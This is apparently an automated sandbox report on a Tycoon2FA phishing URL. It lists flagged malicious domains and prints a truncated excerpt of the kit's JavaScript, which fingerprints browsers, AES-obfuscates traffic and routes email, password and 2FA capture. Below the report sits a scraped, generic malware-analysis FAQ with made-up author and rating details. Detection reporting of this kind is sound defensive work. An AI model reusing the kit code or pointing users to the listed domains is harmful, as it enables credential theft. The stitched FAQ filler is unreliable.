Automated Malware Analysis Management Report for https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/ (2024)


Overview

General Information

Sample URL: https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/
Analysis ID: 1470243

Detection

HTMLPhisher, Tycoon2FA

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Yara detected HtmlPhish10

Yara detected Tycoon 2FA PaaS

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Phishing site detected (based on shot match)

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

HTTP GET or POST without a user agent

Invalid T&C link found

Stores files to the Windows start menu directory

Classification


Signatures

AV Detection


Source: https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/ SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://pes.logentr.com/mnurqprhukiuaxcargTELAUYNYDORTTUFCTRQZWSMFJJRXESDQSSJIVQIVWL12CLwAxoAMvR785pBvWqr50 Avira URL Cloud: Label: malware
Source: https://pes.logentr.com/mnurqprhukiuaxcargTELAUYNYDORTTUFCTRQZWSMFJJRXESDQSSJIVQIVWLpqfH0qhQAPX0L3PTK12e5i6wx33 Avira URL Cloud: Label: malware
Source: https://i8g.25bvnw8.ru/OGRErAiYFRWPrIyzEhjMLxybbUEjmxqvscHFPEBEMHWJZGUDULHSNAXLHFXXWLFM Avira URL Cloud: Label: phishing

Phishing


Source: https://8ex.unceridefu.com LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://8ex.unceridefu.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The domain name is suspicious and does not appear to be related to Microsoft. The page prominently displays a login form asking for a password, which is a common tactic used in phishing attacks. The email address shown (admin@microsoft.com) is used to mislead users into thinking the site is legitimate. There is no CAPTCHA present, which is often used on legitimate login pages to prevent automated attacks. The combination of these factors strongly suggests that this is a phishing site. DOM: 3.8.pages.csv
Source: https://8ex.unceridefu.com LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://8ex.unceridefu.com' is highly suspicious and does not match the legitimate domain 'microsoft.com'. The webpage resembles a Microsoft login page, which is a common target for phishing attacks. The presence of a prominent login form asking for a password is a red flag. The domain name 'unceridefu.com' is not associated with Microsoft and appears to be randomly generated, which is a common tactic used in phishing attacks to mislead users. Additionally, the email address 'admin@microsoft.com' is used to create a sense of legitimacy, which is a social engineering technique. There is no CAPTCHA present, which is often used on legitimate sites to prevent automated attacks. Based on these factors, it is highly likely that this is a phishing site. DOM: 3.9.pages.csv
Source: Yara match File source: 3.8.pages.csv, type: HTML
Source: Yara match File source: 3.7.pages.csv, type: HTML
Source: Yara match File source: 3.9.pages.csv, type: HTML
Source: Yara match File source: 1.4.pages.csv, type: HTML
Source: https://8ex.unceridefu.com/YGXCBGSOMDADAAJUMLTW79582967569965683538ellvnhkbeynhobodmuiudlva?cyqpokupoqvuxlkqkaaQKBXMCCCYPQHKQMTIA Matcher: Found strong image similarity, brand: MICROSOFT
Source: https://8ex.unceridefu.com/YGXCBGSOMDADAAJUMLTW79582967569965683538ellvnhkbeynhobodmuiudlva?cyqpokupoqvuxlkqkaaQKBXMCCCYPQHKQMTIA Matcher: Template: microsoft matched
Source: https://8ex.unceridefu.com/YGXCBGSOMDADAAJUMLTW79582967569965683538ellvnhkbeynhobodmuiudlva?cyqpokupoqvuxlkqkaaQKBXMCCCYPQHKQMTIA Matcher: Template: microsoft matched
Source: https://8ex.unceridefu.com/cY2tCmX2/ Matcher: Template: captcha matched
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/64r5w/0x4AAAAAAAedK2YDU21MRige/auto/normal/auto/ Matcher: Template: captcha matched
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/64r5w/0x4AAAAAAAedK2YDU21MRige/auto/normal/auto/ Matcher: Template: captcha matched
Source: https://8ex.unceridefu.com/YGXCBGSOMDADAAJUMLTW79582967569965683538ellvnhkbeynhobodmuiudlva?cyqpokupoqvuxlkqkaaQKBXMCCCYPQHKQMTIA HTTP Parser (capture truncated in the report):
    var websitenames = ["godaddy", "okta"];
    var capnum = 1;
    var appnum = 1;
    var view = "";
    var pagelinkval = "wJIy";
    var emailcheck = "0";
    var webname = "rtrim(/web8/, '/')";
    var urlo = "werie6jZkbSUVFErOYvIPRRTYlJ8py2bNxmlwv8AqvJBA6i";
    var gdf = "ijCrZyKtzZYZV4lkDyzvdslXsglHEIWVmyy0zcd120";
    var odf = "ijCIhNRzgMfT9tdqyzIVc7eEM9Lfzz5UFtTab648";
    var requestsent = false;
    var pagedata = "";
    var redirecturl = "";
    let userAgent = navigator.userAgent;
    let browserName;
    let userip;
    let usercountry;
    var errorcodeexecuted = false;
    if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";}
    else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";}
    else if(userAgent.match(/safari/i)){ browserName = "safari";}
    else if(userAgent.match(/opr\//i)){ browserName = "opera";}
    else if(userAgent.match(/edg/i)){ browserName = "edge";}
    else{ browserName="No browser detection";}
    function encryptData(data) {
      const key = CryptoJS.enc.Utf8.parse('1234567890123456');
      const iv = CryptoJS.enc.Utf8.parse('1234567890123456');
      const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC });
      return encrypted.toString();
    }
    function decryptData(encryptedData) {
      const key = CryptoJS.enc.Utf8.parse('1234567890123456');
      const iv = CryptoJS.enc.Utf8.parse('1234567890123456');
      const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC });
      return decrypted.toString(CryptoJS.enc.Utf8);
    }
    const sendAndReceive = (route, args, getresponse) => {
      if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}
      if(requestsent == false || route == "twofaselect"){
        requestsent = true;
        let routename = null;
        let randpattern = null;
        if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}
        if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}
        if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}
        if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}
        let randexp = new RandExp(randpattern);
        let randroute = randexp.gen();
        let formattedargs = 0;
        if(route == "checkemail"){formatted

FAQs

What is automated malware analysis? ›

Fully automated analysis scans suspected malware files using automated tools, focusing on what the malware can do once inside your system. After the analysis, you get a report outlining the potential damage to assets connected to your network.

How do I set up a malware analysis VM? ›

1. Prepping your VM for Malware Analysis
  1. Create a virtual machine.
  2. Choose an OS type.
  3. Allocate RAM. Most virtual machine configurations recommend a minimum of 1024 MB.
  4. Create a virtual hard disk. ...
  5. Allocate storage. ...
  6. Install guest OS. ...
  7. Snapshot your VM.
May 1, 2023

How do I create a malware analysis lab? ›

Steps for Building Malware Analysis Labs
  1. Install VMware or VirtualBox in your environment.
  2. Create a Windows 10 lab VM from a Windows 10 ISO file.
  3. Important step: after installing Windows, take a snapshot and save it as "BASE LAB".
Jan 14, 2024

How to detect malware using AI? ›

Detecting malware requires comprehensive analysis of files, images, and other downloadable data. Our AI system monitors every attachment that enters our server and inspects the code inside incoming files for unusual scripts.

What is the difference between a virus and a malware scanner? ›

Antivirus software is designed primarily to prevent infection, but also includes the ability to remove malware from an infected computer. Stand-alone malware remover provides a convenient way of finding and removing malware from a computer or device in case the product already installed is unable to do so.

How do I run a malware virus scan? ›

Run a malware scan manually
  1. Select Start > Settings > Update & Security > Windows Security and then Virus & threat protection. Open Windows Security settings.
  2. Under Current threats, select Quick scan (or in early versions of Windows 10, under Threat history, select Scan now).

Is it safe to open malware on a VM? ›

Virtualization is not a perfect solution for testing malware; it has its own challenges and limitations. Malware can detect that it is running in a VM and change its behavior or stop working, to evade analysis or avoid triggering alarms.

How does a VM get corrupted? ›

Hardware failures: physical issues with the underlying hardware, such as hard disk failures or memory faults, can lead to data corruption within the virtual machine. Malware and virus attacks: malware and other security threats, including viruses and ransomware, compromise data integrity on virtual machines.

How do you trace malware? ›

10 Malware Detection Techniques
  1. Signature-based detection. ...
  2. Static file analysis. ...
  3. Dynamic malware analysis. ...
  4. Dynamic monitoring of mass file operations. ...
  5. File extensions blocklist/blocklisting. ...
  6. Application allowlist/allowlisting. ...
  7. Malware honeypot/honeypot files. ...
  8. Checksumming/cyclic redundancy check (CRC)
Jan 3, 2023

What software is used to scan for malware? ›

Does Malwarebytes remove all malware? Yes, the best virus scanner will be both a virus removal tool and an anti-malware program such as Malwarebytes for Windows, Malwarebytes for Mac, Malwarebytes for Android, or Malwarebytes for Chromebook.

What is Android malware analysis? ›

Android malware analysis is a critical aspect of cybersecurity focused on understanding, identifying, and mitigating malicious software specifically designed for Android operating systems. As the popularity of Android devices continues to grow, so does the threat landscape of malware targeting these platforms.

What is meant by malware analysis? ›

Malware Analysis is the practice of determining and analyzing suspicious files on endpoints and within networks using dynamic analysis, static analysis, or full reverse engineering.

What is automated behavioral analysis of malware? ›

Cuckoo Sandbox is an open-source, automated malware analysis system compatible with Windows, macOS, Linux, and Android platforms. It efficiently examines suspicious files within minutes, providing a detailed report on the discovered behavior in a realistic, isolated environment.

What is an automated malware analysis tool in which malware can be dynamically analyzed called? ›

Malware Sandbox is a dynamic malware analysis technology that analyzes files and URLs in a secure virtual environment. Dynamic malware analysis is particularly helpful for discovering sophisticated attacks, so many organizations are switching to dynamic and hybrid malware analysis tools.

What are the two common techniques for malware analysis? ›

Two forms of malware analysis exist for malicious executables: static and dynamic. As its name implies, static analysis (also known as static binary analysis or source code analysis) examines computer code without executing a program. Alternatively, dynamic analysis examines the behavior of a program at runtime.

Article information

Author: Delena Feil

Views: 6275

Rating: 4.4 / 5 (65 voted)

Reviews: 88% of readers found this page helpful
